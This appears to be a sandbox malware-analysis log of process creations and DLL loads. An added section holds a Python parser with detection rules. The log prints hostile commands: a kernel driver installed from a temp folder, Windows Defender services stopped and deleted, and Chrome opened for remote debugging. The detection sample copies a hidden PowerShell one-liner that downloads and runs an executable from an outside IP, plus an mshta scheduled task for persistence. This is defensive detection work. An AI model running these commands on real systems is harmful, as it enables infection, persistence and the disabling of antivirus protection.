Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe "C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\504C.tmp\504D.tmp\504E.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2284,i,14052270885634350460,10056788384925105811,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2484 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process created: unknown unknown
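Added example, not part of the Joe Sandbox report: a Python parser for the "Process created" lines above, plus detection rules for the behaviours those lines record (the schtasks task that re-runs the .hta through mshta, the PowerShell download-and-execute one-liner, the kernel driver service created from %TEMP%, the Defender service and ACL tampering, and Chrome started with --remote-debugging-port by MSBuild.exe). The rule names, helper functions and the %TEMP% value used by expected_drop_path are my assumptions; the SAMPLE lines are copied from the report. Two details worth a practitioner's attention: the report attributes one of the two PowerShell launches to schtasks.exe rather than mshta.exe, so the download rule is deliberately parent-agnostic; and $env:temp+'NAME' concatenates without a separator, which is why the payload runs from ...\Local\Temp6TLP... instead of from inside %TEMP%, so path-based matching has to key on the file name, not on a Temp\ prefix.

```python
"""Parser and detection rules for the 'Process created' lines above.
Added example, not part of the Joe Sandbox report; SAMPLE is copied from the
report, while the rule names, helpers and the %TEMP% value are assumptions."""
import re

SPLIT = " Process created: "
# image path ends at the first ".exe" (any case); the rest is the command line
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$", re.I)
# directories an unprivileged user can write to
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
# the $d=$env:temp+'NAME' fragment of the one-liner
DROP_RE = re.compile(r"\$d=\$env:temp\+'([^']+)'", re.I)

def parse_line(line):
    """Return (parent, image, cmdline) for a 'Process created' line, else None."""
    line = line.strip().removesuffix(" Jump to behavior")  # report link label
    if not line.startswith("Source: ") or SPLIT not in line:
        return None
    parent, rest = line[len("Source: "):].split(SPLIT, 1)
    m = IMAGE_RE.match(rest)
    if m is None:                                         # e.g. "unknown unknown"
        image, _, cmdline = rest.partition(" ")
        return parent.strip(), image, cmdline
    return parent.strip(), m.group("image"), m.group("cmdline") or ""

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def expected_drop_path(cmdline, temp=r"C:\Users\user\AppData\Local\Temp"):
    """$env:temp+'NAME' has no separator, so the payload lands beside %TEMP%
    as 'TempNAME'; that is the image path the report shows for the dropped file."""
    m = DROP_RE.search(cmdline)
    return temp + m.group(1) if m else None

# each rule takes (parent, image, cmdline) and returns True on a hit
RULES = {
    # scheduled task whose action runs mshta on an .hta in a user-writable path
    "schtasks_persist_mshta": lambda p, i, c: (
        basename(i) == "schtasks.exe" and "/create" in c.lower()
        and re.search(r"\bmshta\b", c, re.I) is not None
        and USER_WRITABLE.search(c) is not None),
    # download-and-execute one-liner; parent-agnostic on purpose, since the
    # report attributes one PowerShell launch to schtasks.exe rather than mshta.exe
    "powershell_download_execute": lambda p, i, c: (
        basename(i) == "powershell.exe"
        and re.search(r"downloadfile|downloadstring|invoke-webrequest", c, re.I) is not None
        and re.search(r"start-process|invoke-expression|\biex\b", c, re.I) is not None),
    # PowerShell launching a binary from a user-writable directory
    "powershell_spawns_dropped_binary": lambda p, i, c: (
        basename(p) == "powershell.exe" and USER_WRITABLE.search(i) is not None),
    # kernel driver service whose binPath is under a user-writable directory
    "kernel_driver_from_user_path": lambda p, i, c: (
        basename(i) == "sc.exe"
        and re.search(r"\bcreate\b.*type=\s*kernel", c, re.I) is not None
        and USER_WRITABLE.search(c) is not None),
    # stopping/deleting Defender services, or deleting their service keys
    "defender_service_tamper": lambda p, i, c: (
        basename(i) in ("sc.exe", "reg.exe")
        and re.search(r"\b(stop|delete)\b.*\b(WinDefend|MDCoreSvc)\b", c, re.I) is not None),
    # ownership/ACL changes on the Defender data directory
    "defender_dir_acl_tamper": lambda p, i, c: (
        basename(i) in ("takeown.exe", "icacls.exe") and "windows defender" in c.lower()),
    # Chrome given a DevTools port by something other than Chrome itself
    "chrome_remote_debugging_by_foreign_parent": lambda p, i, c: (
        basename(i) == "chrome.exe" and "--remote-debugging-port" in c.lower()
        and basename(p) != "chrome.exe"),
}

def detect(lines):
    """Run every rule over every parsable line; return [(rule, parent, image), ...]."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parent, image, cmdline = rec
        hits += [(name, basename(parent), basename(image))
                 for name, rule in RULES.items() if rule(parent, image, cmdline)]
    return hits

# constructed input: lines copied from the report above (the last one is a
# "Section loaded" line, included to show that parse_line skips it)
SAMPLE = r"""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2284,i,14052270885634350460,10056788384925105811,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2484 /prefetch:3
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wsock32.dll Jump to behavior
""".strip().splitlines()

if __name__ == "__main__":
    for rule, parent, image in detect(SAMPLE):
        print(f"{rule:42} {parent} -> {image}")
```

Feeding the full report through detect() instead of SAMPLE works unchanged, because parse_line ignores every line that is not a "Process created" entry. The rules are intentionally keyed on the child image and command line rather than on the parent, which is what keeps the second PowerShell launch (parent recorded as schtasks.exe) from slipping past them.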
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll Jump to behavior
